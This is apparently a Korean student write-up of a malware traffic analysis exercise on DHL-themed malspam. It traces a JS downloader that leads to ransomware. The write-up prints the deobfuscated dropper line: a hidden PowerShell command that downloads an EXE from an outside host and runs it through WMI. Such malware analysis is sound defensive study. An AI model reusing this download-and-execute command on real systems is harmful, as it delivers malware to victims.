[SK 쉴더스 루키즈] Malware Traffic Analysis - INFECTION TRAFFIC FROM ITALIAN DHL-THEMED MALSPAM 문제 풀이

한 줄 정리: PowerShell을 통해 EXE를 다운로드하고 실행하는 시나리오

DHL 사칭 메일 수신
↓
메일 내 링크 클릭
↓
DHL-Express-Customer-Invoice.js 다운로드
↓
JS 다운로더 실행
↓
1차 악성코드 다운로드
↓
2차 악성코드(hero.exe) 다운로드
↓
랜섬웨어 실행
↓
파일 암호화

 

 

 

DHL 인데 메일송신주소가 yahoo이다.

저 링크를 클릭하면 js 파일이 받아졌다고 한다. 그런데 지금은 막혀서 js 파일을 그냥 따로 줬다.

 

 

함수 이름 개성 확실하네

 

 

eval, new Function으로 실행하는 부분을 주석처리하고 log로 찍어보자.

GqojTOkSJliyAgUR.ShellExecute("cMD.Exe", "/c powershell.exe -noprofile -windowstyle hidden  -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://winterforcing.info/get/get.php?yDokni','%temp%RNi25.eXe');
INvokE-WMiMeThod -Class WIN32_ProCESs -NAME CrEAtE -ArgUMEnTLiSt '%temp%RNi25.Exe'", "", "open", 0);

 

명령어 부분만 발췌

[첫번째 부분]
powershell.exe -noprofile -windowstyle hidden  -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://winterforcing.info/get/get.php?yDokni','%temp%RNi25.eXe');

[두번째 부분]
INvokE-WMiMeThod -Class WIN32_ProCESs -NAME CrEAtE -ArgUMEnTLiSt '%temp%RNi25.Exe'

 

중간까지만 난독화 풀었는데도 알아볼 수 있을 정도이다.

 

[첫번째 부분]

http://winterforcing.info/get/get.php?yDokni에서 파일을 다운로드 하여 %temp%RNi25.eXe 로 저장하는 명령어이다.

 

[두번째 부분]

-Class WIN32_Process: WMI의 Win32_Process 클래스 사용

-Name Create: Win32_Process.Create() 메서드 호출

-ArgumentList '%temp%\\RNi25.eXe': 실행할 프로그램 경로 전달

결과 명령어: Win32_Process.Create("%temp%\\RNi25.eXe")

 

[종합 해석]

http://winterforcing.info/get/get.php?yDokni에서 파일을 다운로드 하여 %temp%RNi25.eXe 로 저장하고 WMI Win32_Process.Create로 실행하는 악성코드이다.

 

WMI이란?

Windows를 관리하기 위한 인터페이스

할 수 있는 요청들 예시

• 현재 실행 중인 프로세스 알려줘
• 서비스 상태 알려줘
• 프로그램 실행해줘(계산기 실행 명령어)

• Invoke-WmiMethod `
    -Class Win32_Process `
    -Name Create `
    -ArgumentList "calc.exe"

• 컴퓨터 정보 알려줘

그냥 실행 안 하고 WMI를 쓰는 이유

• 원격 실행 가능
• 관리 기능 접근 가능
• 일부 탐지 우회 가능